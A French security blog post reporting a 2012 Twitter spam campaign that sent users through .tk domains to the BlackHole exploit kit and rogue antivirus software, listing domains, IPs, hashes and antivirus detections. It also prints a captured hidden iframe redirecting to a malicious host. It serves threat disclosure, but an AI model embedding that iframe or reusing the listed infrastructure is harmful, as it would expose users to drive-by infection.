Spam Twitter : Rogues/Scarewares Attack

Une attaque de spam a actuellement lieu sur Twitter.
Pas mal de compte sont compromis et envoient des messages automatiques qui proposent de scanner son ordinateur en ligne via des liens sur des domaines .tk

Quelques exemples de ces domanes qui pointent tous sur la même IP :

faseewq.TK has address 176.57.209.48
fasssqw.TK has address 176.57.209.48
fasvvver.TK has address 176.57.209.48
gamnolt.TK has address 176.57.209.48
huttterw.TK has address 176.57.209.48
nasewr.TK has address 176.57.209.48
nasrew.TK has address 176.57.209.48
saddddre.TK has address 176.57.209.48
salokj.TK has address 176.57.209.48
saqwnbh.TK has address 176.57.209.48
sareqwc.TK has address 176.57.209.48
sasbbert.TK has address 176.57.209.48
sawxqza.TK has address 176.57.209.48
saxuyte.TK has address 176.57.209.48
sexqqwa.TK has address 176.57.209.48
sqwacve.TK has address 176.57.209.48
WEQCVVV.TK has address 176.57.209.48
wqderbbc.TK has address 176.57.209.48
zasehho.TK has address 176.57.209.48
zasqwertf.TK has address 176.57.209.48
zassqwer.TK has address 176.57.209.48
ZASSSRE.TK has address 176.57.209.48 

 


Le lien conduit à un exploit sur site WEB via l’exploitkit BlackHole.
Le fichier installe le rogue/scareware Security Sphere 2012 : http://www3.malekal.com/malwares/index.php?hash=4d01d080a08393088b489b5639240d71

 

https://www.virustotal.com/file/d5b01fa79bf20f43549331f066b19a27839c2540942d0ed5d44da28bcab77139/analysis/ 
 
SHA256: d5b01fa79bf20f43549331f066b19a27839c2540942d0ed5d44da28bcab77139
File name: 4d01d080a08393088b489b5639240d71
Detection ratio: 3 / 42
Analysis date: 2012-04-18 07:18:51 UTC ( 42 minutes ago )
Kaspersky Trojan-FakeAV.Win32.Agent.dqs 20120418
McAfee FakeAlert-SecurityTool.ea 20120418
Panda    Suspicious file    20120417

puis on arrive sur une fausse page de scan
qui au final délivre un setup.exe : http://www3.malekal.com/malwares/index.php?hash=55f4988fd75d414946c821c8838554a3

https://www.virustotal.com/file/454b6242beb9b0443cc7628a7250a4c7b1925dda783fcab383e866074e490053/analysis/
ClamAV    PUA.Packed.ASPack    20120418Kaspersky Trojan-FakeAV.Win32.Romeo.dv 20120418
McAfee FakeAlert-FCG!55F4988FD75D 20120418
McAfee-GW-Edition FakeAlert-FCG!55F4988FD75D 20120417
NOD32 a variant of Win32/Adware.WintionalityChecker.AF 20120418 


Cette fois, on arrive au le rogue/scareware Windows Guard Solutions.
C’est cette famille de rogues relativement actives depuis quelques semaines :

Le nom change tous les deux jours.


Les Rogues/Scarewares sont toujours aussi actifs ! Deux pour le prix d’un (si votre PC est mal protégé).

Vous trouverez une procédure pour supprimer ces malwares sur  la page suivante : https://forum.malekal.com/supprimer-les-rogues-scarewares-t5472.html 

 

Un coucou spécial à SecuBox Labs et S!Ri

 

EDIT – SPAM stoppé

Les domaines sont down et conduisent à des sites parkings – Le spam semble stoppé.

faseewq.TK has address 93.170.52.30
faseewq.TK has address 93.170.52.20
fasssqw.TK has address 93.170.52.20
fasssqw.TK has address 93.170.52.30
fasvvver.TK has address 93.170.52.30
fasvvver.TK has address 93.170.52.20
gamnolt.TK has address 93.170.52.30
gamnolt.TK has address 93.170.52.20
huttterw.TK has address 93.170.52.30
huttterw.TK has address 93.170.52.20
nasewr.TK has address 93.170.52.30
nasewr.TK has address 93.170.52.20
nasrew.TK has address 93.170.52.20
nasrew.TK has address 93.170.52.30
saddddre.TK has address 93.170.52.20
saddddre.TK has address 93.170.52.30
salokj.TK has address 93.170.52.20
salokj.TK has address 93.170.52.30
saqwnbh.TK has address 93.170.52.20
saqwnbh.TK has address 93.170.52.30
sareqwc.TK has address 93.170.52.30
sareqwc.TK has address 93.170.52.20
sasbbert.TK has address 93.170.52.30
sasbbert.TK has address 93.170.52.20
sawxqza.TK has address 93.170.52.30
sawxqza.TK has address 93.170.52.20
saxuyte.TK has address 93.170.52.20
saxuyte.TK has address 93.170.52.30
sexqqwa.TK has address 93.170.52.20
sexqqwa.TK has address 93.170.52.30
sqwacve.TK has address 93.170.52.30
sqwacve.TK has address 93.170.52.20
WEQCVVV.TK has address 93.170.52.20
WEQCVVV.TK has address 93.170.52.30
wqderbbc.TK has address 93.170.52.30
wqderbbc.TK has address 93.170.52.20
zasehho.TK has address 93.170.52.20
zasehho.TK has address 93.170.52.30
zasqwertf.TK has address 93.170.52.30
zasqwertf.TK has address 93.170.52.20
zassqwer.TK has address 93.170.52.30
zassqwer.TK has address 93.170.52.20
ZASSSRE.TK has address 93.170.52.30
ZASSSRE.TK has address 93.170.52.20 
 
 

A  noter qu’il y avait aussi du spam sur des adresses tw1.su – le spam avec ces adresses continuent mais c’est moins violents que celles en .TK

 

EDIT – Ca continue

VITEDDA.TK has address 77.222.40.167
WINLOCKKKK.TK has address 77.222.40.167
malekalmorte@MaK-tux:/tmp$ curl -s WINLOCKKKK.TK
<iframe src=”//23.19.232.6/main.php?page=1ccc62b1af0f8582″ width=”3″ height=”3″ align=”left”></iframe> 

EDIT – Kaspersky a bloggué : http://www.securelist.com/en/blog/208193477/New_Spam_campaign_on_Twitter_Leads_to_Rogue_AV

 

EDIT – 27 Juillet

Une nouvelle campagne qui refourgue du Live Security Platinum via un exploit BlackHole
=> http://www3.malekal.com/malwares/index.php?domaine=184.82.60.172

(Visité 52 fois, 1 visites ce jour)

Vous pouvez aussi lire...